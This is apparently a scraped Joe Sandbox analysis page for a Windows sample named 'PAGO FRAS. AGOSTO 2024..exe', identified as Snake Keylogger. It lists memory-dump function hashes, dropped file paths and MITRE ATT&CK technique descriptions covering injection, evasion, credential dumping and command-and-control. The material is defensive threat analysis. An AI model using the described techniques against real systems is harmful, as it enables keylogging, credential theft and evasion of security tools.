Source File: 00000004.00000002.4131810114.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_22830000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c7481d2b1fa31b939f8007a19f5a285b43e00c5cef6a936b87b060d2e356538
Instruction ID: 897f4d8544c0d72e18c40d1fd24e9153af77e3e7ca385a5983043727fd59b326
Opcode Fuzzy Hash: 0c7481d2b1fa31b939f8007a19f5a285b43e00c5cef6a936b87b060d2e356538
Instruction Fuzzy Hash: 80C19E78E00318CFDB14DFA9C994B9DBBB2BB89300F1081A9D409AB365DB759E85CF51

Function 001FF2C0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e60340f4c73ac7d47322006c4027c73e6cfd830f505848ce403ce0f7c903da7
Instruction ID: 90b7431402bc558bdabeff5b6ebaf3334cc861b8c39cdb2a18684cc204ad99ae
Opcode Fuzzy Hash: 5e60340f4c73ac7d47322006c4027c73e6cfd830f505848ce403ce0f7c903da7
Instruction Fuzzy Hash: 02513770D01208CBDB14DFA9D4557EEBBB2BF89300F24D129E504BB2A5DBB69982CF54

Function 001FF4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a9d68278761f1ccd847c3827d67b8e7ce622302c381b6229a5099247bdd1259
Instruction ID: 5b1b9665a1891ebfd12b0242d84934b2398b094d9da8ffa1c6899ab0969df79e
Opcode Fuzzy Hash: 9a9d68278761f1ccd847c3827d67b8e7ce622302c381b6229a5099247bdd1259
Instruction Fuzzy Hash: 6751F370D0120CCFCB14DFA8D494BAEBBB1FF49300F249129E605AB2A5D7B69982CF54

Function 2283B081 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4131810114.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_22830000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6aee7dc39876520f89c3f31910c10a0d496e57e6f1159c8ff729b8ce6ecd69
Instruction ID: 05a728829109e54067f927f16aee51f2bc4ab70d54fcbd13d79aaeec546b0ec3
Opcode Fuzzy Hash: 4b6aee7dc39876520f89c3f31910c10a0d496e57e6f1159c8ff729b8ce6ecd69
Instruction Fuzzy Hash: 9741ECB8E022199FCB01DFA8D594BEEBBF1AF49308F1444A9E454B7390D7389A40CF95

Function 001F7700 Relevance: 10.5, Strings: 8, Instructions: 453COMMON

Download Yara Rule

Strings

(o^q, xrefs: 001F7C0F
(o^q, xrefs: 001F7BFF
(o^q, xrefs: 001F7815
(o^q, xrefs: 001F78B2
,bq, xrefs: 001F7B90
,bq, xrefs: 001F7BA0
(o^q, xrefs: 001F77E9
(o^q, xrefs: 001F772E

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: 8d6a1ca4a82cfe3bfc6805d6f629f74398ffb8b203e533f2f2ad79dcd14752b8
Instruction ID: ec275575c69abe5c67b7513b0404959e2763880c7df943eac076a9d0b2344f56
Opcode Fuzzy Hash: 8d6a1ca4a82cfe3bfc6805d6f629f74398ffb8b203e533f2f2ad79dcd14752b8
Instruction Fuzzy Hash: 24126A30A04209CFCB25CF69C984AAEBBF2FF89314F158569E9199B3A1D731ED45CB50

Function 001F76F1 Relevance: 5.3, Strings: 4, Instructions: 273COMMON

Download Yara Rule

Strings

(o^q, xrefs: 001F7815
(o^q, xrefs: 001F78B2
(o^q, xrefs: 001F77E9
(o^q, xrefs: 001F772E

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: 63fb408b9bd38ec7585f2d441b68d13334e77bb5b98f67dca90c0ea690271ddf
Instruction ID: cbb2426636ab74c30ecf2bd79d5d99efeb2d0be8fec4bdc21a156486da06caf4
Opcode Fuzzy Hash: 63fb408b9bd38ec7585f2d441b68d13334e77bb5b98f67dca90c0ea690271ddf
Instruction Fuzzy Hash: 85C14930A042099FCB14CF69C984AAEBBF2FF49314F158559EA59EB3A1D731ED41CB90

Function 001F2A69 Relevance: 5.1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

Strings

Xbq, xrefs: 001F2BA4
Xbq, xrefs: 001F2AD8
Xbq, xrefs: 001F2B57
Xbq, xrefs: 001F2A9E

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: de13095397c2b107ebfb5fedd8065aeb4b3b251f143f8af1b702de8dfd23cc6d
Instruction ID: 2a5dcf2d956713bda838384f6ecc5fd9e65291aa37b0be5bad2b2eb546705098
Opcode Fuzzy Hash: de13095397c2b107ebfb5fedd8065aeb4b3b251f143f8af1b702de8dfd23cc6d
Instruction Fuzzy Hash: 49313071E0421D8BDF74CF6989813BFBBB6AB94310F1444B5CA19A7295DB30CE85CB92

Function 001F6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 001F6936
\;^q, xrefs: 001F692C
\;^q, xrefs: 001F695E
\;^q, xrefs: 001F6952

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: c49ee84a0468f197534eee411ffc1587d8d857efe634fdb33d48507a7ff0ea4a
Instruction ID: 8a485fbf94302fac9c9f097b1764bc4d20b8110b1ae188631319919967efeeda
Opcode Fuzzy Hash: c49ee84a0468f197534eee411ffc1587d8d857efe634fdb33d48507a7ff0ea4a
Instruction Fuzzy Hash: 3B01DF31B401098FCB288E2CC54493533EBFF88B68726846AE646CF3B4DBB2DC419740

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PAGO FRAS. AGOSTO 2024..exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0q2xjb4s.i2e.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hu02nhix.l4n.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpsakbxw.4az.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lo4esiim.tjt.ps1

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Jdeforflgelserne.Kid

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exe

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exe:Zone.Identifier

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\discourteously.gam

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\psychograph.rut

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\strudsfjerenes.uns

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\unnamed.jpg

Windows Analysis Report
PAGO FRAS. AGOSTO 2024..exe

Function 0040310F Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Function 004048C5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Function 00405D51 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
stringCOMMON

Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403A41 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 004036AF Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402E9F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Function 0040540E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre